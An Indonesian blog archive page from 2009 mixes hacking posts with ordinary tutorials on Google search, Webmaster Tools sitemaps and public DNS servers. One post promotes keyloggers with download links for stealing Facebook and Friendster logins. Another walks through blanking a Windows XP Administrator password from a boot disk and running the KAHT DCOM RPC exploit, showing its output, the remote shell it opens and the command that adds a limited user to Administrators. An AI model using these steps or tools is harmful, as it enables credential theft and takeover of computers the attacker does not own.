Jumat, 17 April 2009

Mencuri password dan username facebook dengan keylogger

Apa itu keylogger? sebenarnya keylogger itu semacam software yang digunakan untuk memantau kegiatan keyboard komputer, setiap tombol yang di tekan oleh user maka semua record akan di simpan dengan keylogger.

Buat para orang tua biasa nya mereka memantau anak nya yang sedang browsing dengan cara memasang keylogger di komputer, jadi semua situs yang di "search" oleh si anak akan terekam oleh keylogger. sehingga semua situs yang berbau porno bisa langsung ketahuan oleh si orang tua.

Biasa nya keylogger akan di deteksi sebagai vrus oleh "antivirus", karena memang keylogger bisa menjadi 2 mata pisau yang bisa MENGAMANKAN dan juga bisa MEMATIKAN.

Maksud nya mematikan adalah, keylogger bisa saja di gunakan oleh orang-orang yang tidak bertanggung jawab untuk melakukan hacking, banyak orang ingin mencoba melakukan hack pada situs social networking seperti facebook dan friendster.

Jadi tinggal di instal di komputer lalu orang yang menggunakan komputer tersebut akan terekam seluruh kegiatan nya termasuk kegiatan memasukkan "password dan username" facebook dan friendster. bisa saja hal ini dilakukan oleh para pemilik warnet yang iseng dan tidak bertanggung jawab, atau bisa saja dilakukan oleh si pengguna komputer sebelum nya dengan cara mematikan fungsi antivirus nya terlebih dahulu lalu kemudian menginstall keylogger.

Untuk mencari keylogger bisa di cari di kotak kiri sebelah atas dengan kata kunci "keylogger", nah kalo udah download jangan di pake buat yang negatif-negatif ya...ini hanya buat contoh saja.

Nah, ada beberapa cara untuk menghindari cara pencurian "privacy" seperti ini:

1. Lihat search engine di kiri atas "HasiAulia.Net" lalu cari dengan kata kunci "save password" atau "encrypt password"

2. Simpan baik-baik aplikasi tersebut di flashdisk anda dan ketika anda ingin mengisi username dan password di facebook atau friendstersilahkan jalankan aplikasi tersebut, maka keylogger pun akan ter-enkripsi (teracak-acak) dalam menyimpan kegiatan keyboard kita. sehingga keylogger tidak akan bisa mencuri password dan username kita.

Untuk mendownload keylogger nya bisa di download di


DOWNLOAD 1

DOWNLOAD 2

HACKING Friendster untuk pemula

DOWNLOAD KODE PERUSAK FS

Fasilitas’ untuk mengirimkan testimonial di Friendster inilah yang dimanfaatkan cracker untuk ‘mengelabui, menipu, nge hack alakadarnya’ orang-orang yang sering bermain-main dengan Friendster. Oleh karena itu, berhati-hatilah terhadap testimonial yang menggunakan flash. Jika mendapatkan testimonail dari orang yang tidak dikenal (emang bisa ya?) atau flash yang ngga penting, lebih baik tidak usah di approve aja.

Tetapi kita harus tetap berhati-hati untuk approve comment di FS kita , karena mereka sudah mempersiapkan celah-celah untuk memasukan code ‘iseng’ di FS anda.

Saya juga tidak tahu motif mereka apa ?? tapi ada beberapa catatan yang pantas kita renungi bersama kenapa ‘Budaya nge-Blog” (bukan di FS) jauh lebih “beradab dan dianjurkan‘ ada pesan dari salah satu teman kita :

Pesan Chaidir

Pesan buat anak2 ABG pecinta Friendster :

Dan buat anak2 ABG yang sering ke warnet hanya untuk ber-Friendster ria.. apakah tidak ada aktivitas lain di internet selain ber-Friendster-an?! Sangat sayang sekali jika kamu ke warnet cuman liat cowo2 ato cewe2 yang friendsterGenic (keren di friendster doang!) Mendingan belajar cari informasi yang menarik atau belajar apapun dari Internet. Atau lebih baik lagi klo kamu buat buat blog sendiri. Selain belajar nulis, kamu kan juga bisa nambah temen baru. Rugi loh klo bayar 3000 - 4000 perak cuman buat ngeliat Friendster doang, mendingan buat beli bakso!

Apalagi buat para PNS atau pekerja tetap yang ‘jam kerja’ nya habis buat Chating dan buka-buka FS.

Hati-hati … masih ada Comment yang manjur lolos dari pengamatan pihak FS.

ini hanya sebuah trick dan bukan untuk kejahatan, hanya kita yang bisa menyingkapin dengan baek......

good luck........

Pengembangan Google Search Result


Ya... inilah salah satu pengembangan yang dilakukan Google untuk google search result nya
cobalah anda ketik keyword di google toolbar pada brower firefox (tapi sebelum nya anda login dulu di google account milik anda), contoh keyword "tutorial photoshop", maka anda akan mendapatkan hasil seperti ini:



Coba anda perhatikan panah 1 ada sebuah tanda kotak panah atas dan kotak "x", jika anda meng klik kotak panah atas maka akan muncul lagi dialog box konfirmasi untuk perubahan posisi ranking seperti yang di tunjukkan oleh panah 2.

Kesimpulan dari pengembangan ini adalah anda dapat merubah posisi ranking search result hanya untuk google account anda sendiri dan tidak berlaku untuk orang lain, yang berlaku untuk orang lain sebenarnya adalah alogaritma yang telah di tentukan oleh google.

Keuntungan dari pengembangan ini adalah adalah anda dapat menyingkirkan website website mana saja yang kurang bagus dalam search result yang anda dapatkan setelah anda melakukan search dan menentukan website manakah yang menurut anda bagus dan berguna untuk anda.

Hasil ini akan di simpan oleh google dalam google account anda, sehingga jika anda login lagi dengan google account anda dan melakukan search yang sama, maka anda akan mendapatkan search result yang telah anda modifikasi sebelum nya.

Selasa, 14 April 2009

Tekhnik Exploit Password WinXP

Kali ini saya akan mencoba untuk menjelaskan 2 teknik exploitasi pada windows XP, pertama melakukan pemanfaatan SAM files dan terakhir memanfaatkan RPC-nya Windows XP. Tekhnik kedua sebetulnya adalah kelanjutan dari artikelnya mRt di echo zine 10 yang membahas tentang Exploitasi Windows XP [pada fat32] dengan memanfaatkan sang Admin sendiri (hehuehuheue ... ) dan batch file yang disisipkan di start|program|startup oleh sang kriminal :), sedangkan kali ini yang saya bahas adalah jenis NTFS, yang tidak memiliki acces seperti pada fat32 untuk dapat menaruh batch file di folder start up nya sang Admin tersayang, sehingga apabila dipaksakan “Access Denied” adalah jawabannya. Apa akibatnya jika kita menggunakan kedua tekhnik diatas ?, yang jelas mah sama-sama buat orang seneng... heuheueehuhuehuee ! Jawab sendiri dah ...

Tekhnik pertama :
Yang kita butuhkan sekarang adalah :
Petter Recovery Password yang bisa di download dari situsnya langsung http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html sekalian sama infonya aja, biasanya sudah di sediakan dalam bentuk rar yang bisa di jadikan bootdisk. Yang penulis pakai untuk experimen kali ini yaitu versi bd040818 terdapat 3 file di dalamnya yakni bd040818.bin , install.bat , rawrite2.exe .
1 buah disket kosong dan layak pakai. :) --> untuk disket boot Petter Recovery Password.
Nekatzzzz ....

Kasusnya begini, misalnya ....anggap saja kita lupa password untuk login winXP nya. : ) atau kasus yang laen aja kali ya, yang lebih menantang ... hehehe. Misalnya ada rampok yang kebingungan nggak bisa login, padahal kompienya mo dijual ... huehueueheue. Ada yang kesindir nggak nih ??? Udah ah bcanda mulu. Langsung aja deuh ...

Langkah pertama ... Setelah Petter Recovery Password di jadikan bootdisk, langsung saja booting dengan disket tersebut ...
Langkah berikutnya, anda akan di tanya di drive mana SAM file berada. Tekan enter saja untuk defaultnya, setelah itu akan ditanyakan secara spesifik lagi, di direktori mana file SAM berada, biasanya untuk yang defaultnya tuh SAM file berada di /windows/system32/config, enter lagi aja untuk yang defaultnya. Setelah itu ....... Nah sampe disini anda akan di minta User mana yang ingin di ganti/hapus passwordnya. Lebih baik Administrators aja, karena yang kita lakukan saat ini kan mencari cara untuk menjadi SU di Windows XP. Biar gampang melakukan sesuatu nantinya .... hehehehe !!! Untuk eksperiment kali ini lebih baik anda membuat password Administrators menjadi blankpassword [* = blankpassword], supaya gampang nantinya, dan blankpassword merupakan pilihan terbaik dalam menggunakan Petter Password Recovery. Soalnya penulis sendiri telah belasan kali mencoba mengganti password para user dengan tetapi hanya 2 yang berhasil. Sudah ??? ... siiiip, tekan ! untuk mengakhir sesi reset password, dan q untuk mengakhiri scripts tersebut. Selanjutnya anda akan di tanya kembali, ingin mengulang atau tidak. Lebih baik tidak lahhhh ... Edit Completed. Catatan : Setelah menggunakan Petter Recovery Password, Windows berusaha untuk melakukan scandisk, system ne baru di acak-acak nie : ). Tunggu hingga proses scandisk selesai.
Setelah proses booting, anda akan di hadapkan dengan tampilan login yang seperti biasanya. ( Nggak menarik, hehehehe... ) Sekarang tekan ctrl+alt+del, tunggu sebentar dan kemudian tekan kembali ctrl+alt+del. Nah ada tampilan login yang clasic, seperti di windows 98 dulu. Dengan 2 textbox...


-------------------------------------------------
| Log On to Windows | x |
-------------------------------------------------
| User Name : Al-k |
| Password : ****** |
| |
| | Ok | | Cancel | | BLABLABLABLA....| |
-------------------------------------------------

Ya, bentuknya kira-kira seperti diatas ... : )...
Setelah itu ganti usernamenya menjadi Administrator, passwordnya di kosongkan saja, karena sebelumnya kita telah menjadikan blankpassword pada Administrator. Ok. Jreng-jreng-jreng... sekarang anda menjadi super user kembali. Silahkan buat account untuk anda sendiri.

Tekhnik Kedua :
Tiba saatnya kita maju bersama ... :D, memanfaatkan Massive RPC WinXP yang bobrok. Tekhnik kedua ini dibuat untuk para user yang memiliki acces limited. Yang dibuat kesal oleh sang admin, sehingga untuk menginstall suatu software harus minta izin dari sang Admin. :( . Yang dibutuhkan hanyalah acces untuk masuk ke command shell, dan satu tool kecil ‘kaht’ . Siap ???... buka command promptnya ...

C:\Documents and Settings\Al-k>net user

User accounts for \\NOMATTER
-------------------------------------------------------------------------------
Administrator Al-k GNU-- keluarga --
Guest HelpAssistant SUPPORT_388945a0
VUSR_NOMATTER
The command completed successfully.

// Anggap saja disini Al-k adalah user yang limited
// Setelah itu masuk ke direktori di mana kaht berada

D:\Data+ku_>

Kemudian kita test dulu kaht-nya... bisa nggak nih kita nge-root.

D:\Data+ku_>kaht 127.0.0.0 127.0.0.3
_________________________________________________

KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4r@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
FULL VERSION? :) - AUTOHACKING
________________________________________________

[+] Targets: 127.0.0.0-127.0.0.3 with 50 Threads
[+] Attacking Port: 135. Remote Shell at port: 34522
[+] Scan In Progress...
- Connecting to 127.0.0.2

Sending Exploit to a [WinXP] Server...
- Conectando con la Shell Remota...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Tuh kan dapet deh akses rootnya. Jangan seneng dulu. Langsung aja kita
buat akses user yang terbatas tadi menjadi Super User.

C:\WINDOWS\system32> net localgroup Administrators Al-k /add

The command completed successfully.



Selanjutnya anda bisa login dengan user yang baru saja dirubah accountnya tadi. Dan anda bisa login ke account user lain yang memiliki akses sama seperti Administrator, tentunya dengan menghilangkan password user tersebut dulu sebelumnya. Dan anda bisa masuk ke regedit untuk menutup perizinan user account pada control panel :

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/DisallowCpl/

, buat string baru dengan nama 1 dan ubah valuenya menjadi nusrmgr.cpl
Dan bisa anda disable akses ke command prompt kepada semua user. Sehingga anda menjadi SU yang benar-benar otoriter. Sayangnya tekhnik yang kedua ini hanya bisa di lakukan di Windows XP Service Pack 1.

good luck dan selamat mencoba.....

Senin, 13 April 2009

Pengenalan dan Panduan Google Webmaster Tools


Mungkin
90% dari teman - teman semua sudah mengetahui keberadaan Google Webmaster
Tools
, di sini saya akan mencoba memperkenalkan Google Webmaster Tools
beserta beberapa fungsi dari Toolsnya yang penting dan sering
digunakan.

Google Webmaster Tools adalah sebuah alat dan media yang
digunakan google untuk
berkomunikasi dua arah antara pihak google dan kita sebagai webmaster.

Dengan Google
Webmaster Tools kita dapat mengoptimalkan proses indexing.
Sebagai contoh
apakah anda pernah melihat suatu "website yang memiliki halaman yang dalam",
maksudnya dari:

Halaman Depan -> Category -> Catalog ->
Product

Dimana halaman product tersebut tidak mendapatkan link dari
halaman depan, bot google pasti akan sangat kesulitan mencapai halaman product
untuk mengcrawl nya. Nah disinilah salah satu keuntungan apabila kita
menggunakan Google Webmaster Tools, khususnya tools yang bernama "Google
Sitemap" dan tentunya kalau bisa anda juga Membuat
Halaman Web Menjadi Search Engine Friendly
, Fungsi lebih lanjut tentang
"Google Sitemap" akan saya jelaskan di bawah ini:

1. Google
Sitemap:
adalah sitemap yang berisi daftar url website kita

Fungsinya
adalah mempermudah bot google untuk masuk dan mengcrawl, halaman halaman yang
telah kita sediakan url-nya di atas

Seperti yang telah saya sebutkan tadi
di atas, tentang "website yang memiliki halaman yang dalam", google bot akan
sangat kesulitan masuk dan mengcrawl halaman product, nah karena kita sudah
menyediakan URL Halaman Product di Google Sitemap maka google bot mudah
mencapainya

Komponen dalam Google Sitemap:

loc         : isi
dengan URL anda
lastmod     : isi dengan tanggal terbaru, formatnya
th-bln-hari contoh 2007-10-05
changefreq    : isi dengan frekwensi perubahan
ex. always, daily, weekly
priority    : tentukan prioritas antara 0.1 -
1.0

Contoh :
<?xml version="1.0"
encoding="UTF-8"?>
<urlset
xmlns="http://www.google.com/schemas/sitemap/0.84">
 <url>
 
<loc>http://www.ilmuwebsite.com/</loc>
 
<lastmod>2007-10-05</lastmod>
 
<changefreq>always</changefreq>
 
<priority>1.0</priority>
</url>

<url>
 
<loc>http://www.ilmuwebsite.com/sitemap/</loc>
 
<lastmod>2007-10-05</lastmod>
 
<changefreq>daily</changefreq>
 
<priority>1.0</priority>
</url>

<url>
 
<loc>http://www.ilmuwebsite.com/gb/</loc>
 
<lastmod>2007-10-05</lastmod>
 
<changefreq>always</changefreq>
 
<priority>0.9</priority>
</url>
</urlset>


2.
Robot.txt
60 % pasti anda semua sudah mengetahui Robot.txt
ya.. Robot.txt
adalah suatu file yang berisi restrict / peraturan yang di tujukan kepada bot /
crawler agar tidak mengindek suatu halaman website atau directory atau bahkan
seluruh struktur website, tergantung restrict nya, dalam Google Webmaster Tools
juga ada Robot validator-nya


3. Link
Pada menu link anda dapt
melihat daftar inbound link, internal page, dan anda juga bisa melihat seberapa
banyak halaman website anda yang telah di index oleh Google


4. Domain
Preference
Domain Preference adalah pemilihan awalan dari domain anda apakah
menggunakan "www" atau "tabpa www"

Ex.
menggunakan www
www.ilmuwebsite.com

tidak
menggunakan www
ilmuwebsite.com

Domain Preference
sangat berpengaruh dalam Search Engine Result Page

5. Crawl Speed
Anda
dapat menentukan akan memperlambat atau mempercepat frekwensi google bot datang
ke website anda, jika anda menganggap google bot terlalu sering datang dan
menghabiskan bandwidth, maka anda dapat menurunkan Frekwensi nya

Masuk ke
google webmaster tools anda harus punya Google Accounts, bahasa
lain anda paling tidak harus punya Google Email

Ini link nya menuju Google Webmaster
tools:
http://www.google.com/webmasters/
atau
http://www.google.com/webmasters/tools/

Masih banya
fungsi fungsi yang lain dari Google Webmaster Tools yang belum saya
jabarkan.
sekian penjelasan dari saya... terimakasih

Untuk melihat
blognya : Official Google Webmaster Central Blog

Untuk lebih
jelasnya download pdf nya di: sini

---------------------------------------
Copyright
© 2007, ilmuwebsite Co.
Artikel ini TIDAK boleh di re-publish dalam bentuk
apapun.
Jika anda me-link artikel ini kami akan
menghargainya.
---------------------------------------

Sumber dari situs Ilmu Website dalam kategori search engine tutorial dengan judul Pengenalan dan Panduan Google Webmaster Tools

Sabtu, 11 April 2009

Alternatif DNS untuk Indosat Broadband 3.5G

Pengertian DNS
Domain Name System (DNS) adalah Distribute Database System yang digunakan untuk pencarian nama komputer (name resolution) di jaringan yang menggunakan TCP/IP. DNS merupakan sebuah aplikasi service yang biasa digunakan di internet seperti web browser atau e-mail yang menerjemahkan sebuah domain ke IP address.

Kelebihan DNS
1. Mudah, DNS sangat mudah karena user tidak lagi direpotkan untuk mengingat IP address sebuah komputer, cukup host name.
2. Konsisten, IP address sebuah komputer bisa saja berubah, tapi host name tidak harus berubah.
3. Simple, DNS server mudah untuk dikonfigurasikan (bagi admin).

Fungsi DNS
1. Fungsi dari DNS adalah menerjemahkan nama komputer ke IP address (memetakan nama komputer menjadi IP address).
2. Menjadikan koneksi internet lebih responsif, saat membuka halaman suatu website menjadi lebih cepat.
3. Sangat berfungsi untuk mempercepat koneksi internet (IndosatM2, Indosat Broadband 3.5G, Telkomsel Flash dan Telkom Speedy).

Kekurangan DNS
User tidak dapat menggunakan nama banyak untuk mencari nama domain baik di internet maupun di intranet.

Cara Setting DNS Pada Komputer
1. klik tombol start, Connect to.., pilih koneksi intenet yg sedang digunakan.

2. Pilih Internet Protocol (TCP/IP), kemudian klik tombol properties.

3. Pada tab General pilih Use the following DNS Server Addresses,

kemudian masukan angka - angka di bawah ini :

FREE DNS SERVER LIST :

OpenDNS
208.67.222.222 (primary)
208.67.220.220 (secondary)

Awari
203.142.83.200 (primary) (primary)

203.34.118.10 (primary)
203.34.118.12 (secondary)

Singnet
165.21.83.88

Lintas Artha
202.152.0.2 (primary)
202.152.5.36 (secondary)

CBN
202.158.3.7 (primary)
202.158.3.6 (secondary)

VNSC
4.2.2.1 (primary) (primary)
4.2.2.2 (primary) (primary)
4.2.2.3 (primary) (primary)
4.2.2.4 (primary) (primary)
4.2.2.5 (primary) (primary)
4.2.2.6 (primary) (primary)

SijiwaeNet
202.134.0.155 (primary)
202.134.2.5 (secondary)

selamat mencoba........